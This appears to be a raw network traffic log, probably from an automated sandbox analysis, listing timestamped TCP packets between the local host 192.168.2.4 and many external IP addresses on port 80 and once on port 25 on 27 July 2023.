                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.962922096 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.962982893 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963063002 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963129997 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963215113 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963284016 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963320017 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963387966 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963391066 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963504076 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963521957 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963552952 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963639021 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963669062 CEST8049992188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963722944 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963732958 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963757992 CEST4999280192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963782072 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963845015 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963912010 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.963972092 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964060068 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964114904 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964211941 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964298964 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964317083 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964390993 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964454889 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964566946 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964602947 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964680910 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964720011 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964764118 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964797020 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964848995 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964900970 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964926004 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.964952946 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965045929 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965116024 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965137959 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965225935 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965229034 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965333939 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965379000 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965432882 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965524912 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965563059 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965574980 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965600967 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965683937 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965732098 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965830088 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965903997 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.965970039 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966021061 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966025114 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966111898 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966114998 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966197014 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966284037 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966336012 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966341972 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966437101 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966460943 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966567993 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966610909 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966660023 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966725111 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966797113 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966835976 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966893911 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967003107 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967029095 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967050076 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967088938 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967200041 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967223883 CEST805003362.75.216.137192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967238903 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.967268944 CEST5003380192.168.2.462.75.216.137
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.013346910 CEST5003580192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.014131069 CEST5003680192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.054385900 CEST5003780192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.141830921 CEST8050035208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.183018923 CEST8050037208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.183501959 CEST5003780192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.183502913 CEST5003780192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.226303101 CEST5003880192.168.2.45.196.166.214
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.266793013 CEST80500385.196.166.214192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.269776106 CEST5003880192.168.2.45.196.166.214
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.270175934 CEST5003880192.168.2.45.196.166.214
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.272834063 CEST805003672.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.272948027 CEST5003680192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.273247957 CEST5003680192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.311738968 CEST80500385.196.166.214192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.311810017 CEST80500385.196.166.214192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.311955929 CEST5003880192.168.2.45.196.166.214
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.311979055 CEST8050037208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.313116074 CEST8050037208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.313851118 CEST8050037208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.314011097 CEST5003780192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.380125999 CEST5003780192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.490633965 CEST5003980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.492408037 CEST5004080192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.507021904 CEST8050039188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.507117987 CEST5003980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.508642912 CEST8050037208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.531791925 CEST805003672.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.532037020 CEST805003672.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.532062054 CEST805003672.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.532104969 CEST5003680192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.532150984 CEST5003680192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.546997070 CEST5003680192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.666289091 CEST5004180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.682598114 CEST8050041188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.683330059 CEST5004180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.686199903 CEST8050040122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.689755917 CEST5004080192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.714138031 CEST5004180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.714674950 CEST5004080192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.722676992 CEST5003980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.730663061 CEST8050041188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.738883972 CEST8050039188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.740955114 CEST8050041188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.741065025 CEST5004180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.748657942 CEST8050039188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.750005960 CEST5003980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.787661076 CEST5004180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.794910908 CEST804999872.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.795066118 CEST4999880192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.804754972 CEST8050003165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.804826021 CEST5000380192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.805416107 CEST4996980192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.805588961 CEST805003672.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.808372974 CEST8050041188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.809708118 CEST5004180192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.908592939 CEST8050040122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.909089088 CEST8050040122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.909280062 CEST5004080192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.107686043 CEST5003980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.136441946 CEST8050039188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.136910915 CEST5003980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.284015894 CEST5004280192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.356488943 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.376178980 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.376488924 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.379441023 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.381306887 CEST8050042165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.381433010 CEST5004280192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.382796049 CEST5004280192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.398972988 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440290928 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440443039 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440525055 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440553904 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440602064 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440670013 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440715075 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440762997 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440783024 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440783024 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440783024 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.440834999 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.441708088 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.441764116 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.441809893 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.441839933 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.441869974 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460381985 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460442066 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460486889 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460536003 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460563898 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460623980 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460623980 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460669994 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460688114 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460688114 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460715055 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460715055 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460764885 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460772038 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460809946 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460855961 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460864067 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460900068 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460922003 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460943937 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460989952 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460992098 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.460992098 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461025953 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461200953 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461230040 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461277008 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461291075 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461291075 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461323023 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461361885 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461368084 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461389065 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461414099 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.461469889 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480057001 CEST8050042165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480375051 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480426073 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480474949 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480520964 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480566978 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480581045 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480581999 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480612993 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480629921 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480655909 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480659962 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480710030 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480751991 CEST8050042165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.480765104 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.481029987 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.481115103 CEST5004280192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.567914009 CEST5004380192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.587539911 CEST8050043193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.696192980 CEST5002880192.168.2.464.125.133.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.739651918 CEST804992474.208.236.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.741955042 CEST4992480192.168.2.474.208.236.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.946177006 CEST5003080192.168.2.496.91.204.114
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.019691944 CEST8050011208.109.214.162192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.021928072 CEST5001180192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.086785078 CEST4997680192.168.2.464.125.133.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.087997913 CEST5004425192.168.2.467.195.12.38
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.227408886 CEST5003180192.168.2.4210.140.73.39
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.249130011 CEST255004467.195.12.38192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.249284983 CEST5004425192.168.2.467.195.12.38
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.250948906 CEST5004425192.168.2.467.195.12.38
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.297297001 CEST5004580192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.345681906 CEST8049958202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.345798969 CEST4995880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.377461910 CEST80500203.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.377774954 CEST5002080192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.407680035 CEST5004680192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.410789013 CEST255004467.195.12.38192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.411266088 CEST255004467.195.12.38192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.456696033 CEST5004780192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.461843014 CEST5004425192.168.2.467.195.12.38
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.462091923 CEST4998180192.168.2.496.127.180.42
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.488492012 CEST8050047213.186.33.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.488614082 CEST5004780192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.489036083 CEST5004780192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.522505999 CEST8050047213.186.33.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.522799969 CEST5004780192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.560537100 CEST8050045162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.561938047 CEST5004580192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.578056097 CEST8050046107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.581929922 CEST5004680192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.919414997 CEST805002269.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.920161009 CEST5002280192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.208184958 CEST5004580192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.216430902 CEST5004680192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.241256952 CEST5004780192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.274918079 CEST8050047213.186.33.40192.168.2.4
